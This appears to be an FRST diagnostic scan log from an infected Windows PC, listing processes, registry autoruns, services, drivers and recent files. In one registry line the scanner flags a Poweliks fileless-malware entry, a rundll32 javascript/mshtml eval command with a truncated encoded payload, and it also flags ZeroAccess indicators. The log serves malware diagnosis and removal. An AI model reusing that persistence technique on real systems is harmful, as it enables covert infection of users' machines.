(CANON INC.) C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgui.exe
(CyberLink Corp.) C:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-07-08] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [499608 2011-06-16] (Adobe Systems Incorporated)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2779024 2011-03-14] (CANON INC.)
HKLM-x32\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-03] (Intel Corporation)
HKLM-x32\...\Run: [57xxSteelVine] => C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe [1720320 2007-08-20] ()
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [RIMBBLaunchAgent.exe] => C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe [90448 2011-09-01] (Research In Motion Limited)
HKLM-x32\...\Run: [AMD AVT] => C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe [10752 2012-01-31] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [641664 2012-04-06] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [253816 2013-03-12] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [413696 2009-01-05] (Apple Inc.)
HKLM-x32\...\Run: [CanonSolutionMenuEx] => C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE [1612920 2011-08-04] (CANON INC.)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2013\avgui.exe [4411952 2014-01-21] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKLM\...\InprocServer32: [Default-wbemess] wbemess.dll ATTENTION! ====> ZeroAccess?
HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SpybotSD TeaTimer] => C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [SansaDispatch] => C:\Users\JP\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe [79872 2010-10-16] (SanDisk Corporation)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Run: [DownloadAccelerator] => C:\Program Files (x86)\DAP\DAP.EXE [4242064 2014-10-04] (Speedbit Ltd.)
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...\Policies\Explorer: [NoSaveSettings] 0
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...409d6c4515e9\InprocServer32: [Default-shell32]  <==== ATTENTION!
HKU\S-1-5-21-2804656215-4255892301-2232998820-1003\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Core Temp.lnk
ShortcutTarget: Core Temp.lnk -> C:\Program Files\Core Temp\Core Temp.exe ()
BootExecute: autocheck autochk * sdnclean64.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://duckduckgo.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x410DF1D8953FCD01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
BHO: No Name -> {DBC80044-A445-435b-BC74-9C25C1C588A9} ->  No File
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
BHO-x32: SpeedBit Link Verification Helper -> {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} -> C:\Program Files (x86)\DAP\LinkVerifier.dll (Speedbit Ltd.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO-x32: No Name -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} ->  No File
Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll (Microsoft Corp.)
Toolbar: HKCU - No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} -  No File
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKCU - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} -  No File
Toolbar: HKCU - No Name - {E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39} -  No File
DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {8AD9C840-044E-11D1-B3E9-00805F499D93}
DPF: HKLM-x32 {CAFEEFAC-0016-0000-0017-ABCDEFFEDCBA}
DPF: HKLM-x32 {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA}
DPF: HKLM-x32 {D4B68B83-8710-488B-A692-D74B50BA558E} http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {E705A591-DA3C-4228-B0D5-A356DBA42FBF} http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://employee.bnsf.com/dana-cached/sc/JuniperSetupClient.cab
DPF: HKLM-x32 {F6ACF75C-C32C-447B-9BEF-46B766368D29} http://ccfiles.creative.com/Web/softwareupdate/ocx/110926/CTPID.cab
DPF: HKLM-x32 {FA5D9BCA-4653-49FB-9237-FFA947877414} http://192.168.1.10/ZDVR.CAB
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} -  No File
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: ipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11D1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 8.8.8.8 24.178.162.3 24.247.15.53

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin-x32: @java.com/DTPlugin,version=10.25.2 -> C:\Windows\SysWOW64\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll ()
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [daplinkchecker@speedbit.com] - C:\Program Files (x86)\DAP\daplinkchecker
FF Extension: DAP Link Checker - C:\Program Files (x86)\DAP\daplinkchecker [2014-10-04]

Chrome:
=======
CHR Profile: C:\Users\JP\AppData\Local\Google\Chrome\User Data\Default

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 57xx SteelVine Manager; C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe [1282048 2007-08-20] () [File not signed]
R2 AdobeActiveFileMonitor10.0; C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-01] (Adobe Systems Incorporated)
R2 AntsCMSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe [2403328 2013-03-07] (ANTS) [File not signed]
R2 AntsSTSService; C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe [2038784 2013-03-02] () [File not signed]
S2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [4939312 2013-07-04] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [283136 2013-11-20] (AVG Technologies CZ, s.r.o.)
S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
S3 Creative Media Toolbox 6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\MT6Licensing.exe [79360 2012-08-02] (Creative Labs) [File not signed]
R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [286720 2010-02-12] (Creative Technology Ltd) [File not signed]
R2 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 LightScribeService; C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2011-06-20] (Hewlett-Packard Company) [File not signed]
R2 nTuneService; C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe [276584 2009-11-06] (NVIDIA)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [117264 2009-10-20] (CACE Technologies, Inc.)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 VZWConfigService; C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe [218160 2012-04-16] (Novatel Wireless Inc.)
R2 MYSQL; "C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld" MYSQL [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

S3 61883; C:\Windows\System32\DRIVERS\61883.sys [60288 2009-07-13] (Microsoft Corporation)
S3 AtiHDAudioService; C:\Windows\System32\drivers\AtihdW76.sys [96768 2013-02-14] (Advanced Micro Devices) [File not signed]
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [246072 2013-11-25] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [71480 2013-07-20] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [206648 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [311608 2013-07-20] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [116536 2013-07-01] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [45880 2013-10-23] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [240952 2014-04-15] (AVG Technologies CZ, s.r.o.)
R2 NPF; C:\Windows\System32\drivers\npf.sys [47632 2009-10-20] (CACE Technologies, Inc.)
R3 nvoclk64; C:\Windows\System32\DRIVERS\nvoclk64.sys [42088 2009-09-15] (NVIDIA Corp.)
S3 NwGPSOverWiFi64; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
S3 NWUSBLAN_4620; C:\Windows\System32\DRIVERS\nwblan_4620.sys [47472 2012-09-27] (Belcarra Technologies)
R3 nwusbserial; C:\Windows\System32\DRIVERS\nwvcomnet64.sys [37888 2012-09-27] (Novatel Wireless Inc.)
R3 PPorts; C:\Windows\System32\DRIVERS\PPorts.sys [95744 2009-07-23] ()
R3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [44032 2011-07-20] (Research in Motion Ltd)
S3 RivaTuner64; C:\Program Files (x86)\RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition\RivaTuner64.sys [19952 2010-01-06] ()
S3 Ser2ph; C:\Windows\System32\DRIVERS\ser2ph64.sys [89600 2008-03-06] (Prolific Technology Inc.)
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-17] ()
R3 ALSysIO; \??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys [X]
S3 PcdrNdisuio; syswow64\drivers\pcdrndisuio.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]
S3 RimUsb; System32\Drivers\RimUsb_AMD64.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-20 08:30 - 2014-10-20 09:09 - 00000000 ____D () C:\FRST
2014-10-18 22:06 - 2014-10-18 22:14 - 00000000 ____D () C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
2014-10-18 22:06 - 2014-10-18 22:06 - 00000064 _____ () C:\Windows\GPlrLanc.dat
2014-10-18 15:21 - 2014-10-18 15:21 - 00018835 _____ () C:\Users\JP\Desktop\dds.txt
2014-10-18 15:21 - 2014-10-18 15:21 - 00017360 _____ () C:\Users\JP\Desktop\attach.txt
2014-10-18 00:12 - 2014-10-18 01:08 - 00000000 ____D () C:\Users\JP\AppData\Local\CrashDumps
2014-10-17 22:49 - 2014-10-17 22:50 - 00002428 _____ () C:\Users\JR\Desktop\Rkill.txt
2014-10-17 22:43 - 2014-10-17 22:43 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking
2014-10-17 22:42 - 2014-10-17 22:46 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2014-10-17 22:42 - 00001397 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00001385 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 22:42 - 2014-10-17 22:42 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 22:42 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 22:37 - 2014-10-17 22:37 - 00000348 _____ () C:\Windows\PFRO.log
2014-10-17 22:16 - 2014-10-17 22:16 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 22:16 - 2014-10-17 22:16 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 21:36 - 2014-10-17 21:36 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Share-to-Web Upload Folder
2014-10-17 21:10 - 2014-10-17 21:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Adobe
2014-10-17 21:09 - 2014-10-17 21:09 - 00001449 _____ () C:\Users\JR\Desktop\IE.lnk
2014-10-17 21:09 - 2014-10-17 21:09 - 00001415 _____ () C:\Users\JR\Desktop\IE (64-bit).lnk
2014-10-17 20:58 - 2014-10-17 20:58 - 00119024 _____ () C:\Users\JR\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Intel Corporation
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Canon
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\AVG2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Roaming\ATI
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Hewlett-Packard
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\Avg2013
2014-10-17 20:58 - 2014-10-17 20:58 - 00000000 ____D () C:\Users\JR\AppData\Local\ATI
2014-10-17 20:57 - 2014-10-17 20:57 - 00001449 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00001415 _____ () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2014-10-17 20:57 - 2014-10-17 20:57 - 00000020 ___SH () C:\Users\JR\ntuser.ini
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\VirtualStore
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\NVIDIA Corporation
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR\AppData\Local\Adobe
2014-10-17 20:57 - 2014-10-17 20:57 - 00000000 ____D () C:\Users\JR
2014-10-17 20:57 - 2012-09-21 09:10 - 00000000 ____D () C:\Users\JR\AppData\Roaming\TuneUp Software
2014-10-17 20:57 - 2009-12-13 17:53 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Macromedia
2014-10-17 20:57 - 2009-12-03 18:41 - 00000000 ____D () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Recovery Manager
2014-10-17 20:57 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-10-17 20:57 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\JR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2014-10-17 20:22 - 2014-10-17 20:28 - 00005786 _____ () C:\Users\JP\Desktop\Rkill.txt
2014-10-17 19:48 - 2014-10-20 09:04 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-17 19:47 - 2014-10-17 20:49 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-10-17 19:47 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-17 19:47 - 2014-10-17 19:47 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-17 19:47 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-17 19:47 - 2014-05-12 07:26 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-17 18:43 - 2014-10-20 08:19 - 00000448 _____ () C:\Windows\setupact.log
2014-10-17 18:43 - 2014-10-17 18:43 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-04 14:56 - 2014-10-17 00:48 - 00000000 ____D () C:\Users\Public\Documents\Speedbit
2014-10-04 14:51 - 2014-10-19 03:04 - 00001422 _____ () C:\Users\JP\Desktop\My DAP Downloads.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00001041 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Download Accelerator Plus (DAP).lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000941 _____ () C:\Users\JP\Desktop\DAP.lnk
2014-10-04 14:51 - 2014-10-04 14:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Download Accelerator Plus (DAP)

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-20 09:01 - 2011-12-29 02:14 - 01726263 _____ () C:\Windows\WindowsUpdate.log
2014-10-20 08:27 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-20 08:27 - 2009-07-13 23:45 - 00017168 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-20 08:26 - 2009-07-14 00:13 - 00730384 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-20 08:24 - 2012-09-08 10:10 - 00000000 ____D () C:\ProgramData\MFAData
2014-10-20 08:20 - 2009-12-03 18:17 - 00000000 ____D () C:\ProgramData\Temp
2014-10-20 08:19 - 2013-01-30 22:44 - 00000354 _____ () C:\Windows\Tasks\ROC_PAID_JAN2013_TB_rmv.job
2014-10-20 08:19 - 2013-01-26 11:51 - 00000354 _____ () C:\Windows\Tasks\ROC_JAN2013_TB_rmv.job
2014-10-20 08:19 - 2009-12-03 18:13 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-20 08:19 - 2009-07-14 00:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-19 03:39 - 2012-08-06 17:29 - 00000000 ____D () C:\Users\JP\AppData\Roaming\vlc
2014-10-19 03:18 - 2012-04-23 21:54 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-17 22:43 - 2009-12-15 23:07 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 22:37 - 2009-12-15 23:07 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy
2014-10-17 19:47 - 2012-05-31 22:39 - 00000000 ____D () C:\Users\JP\AppData\Roaming\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-17 00:29 - 2013-01-21 01:54 - 00000000 ____D () C:\Windows\Minidump
2014-10-08 02:44 - 2010-03-05 23:29 - 00000049 _____ () C:\Windows\NeroDigital.ini
2014-10-04 22:22 - 2012-05-31 22:54 - 00000000 ____D () C:\Users\JP\Documents\Vegas Movie Studio PE 9.0 Projects
2014-10-04 14:52 - 2014-01-14 17:49 - 00000000 ____D () C:\Program Files (x86)\DAP
2014-10-04 14:51 - 2014-01-14 17:49 - 00000000 ____D () C:\ProgramData\SpeedBit
2014-10-04 14:51 - 2012-05-30 22:39 - 00000000 ___RD () C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-09-26 14:50 - 2012-11-18 15:51 - 00003168 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForJP
2014-09-26 14:50 - 2012-11-18 15:51 - 00000320 _____ () C:\Windows\Tasks\HPCeeScheduleForJP.job
2014-09-24 03:36 - 2012-04-23 21:54 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 03:36 - 2012-04-23 21:54 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-24 03:36 - 2011-05-21 10:17 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

ZeroAccess:
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@

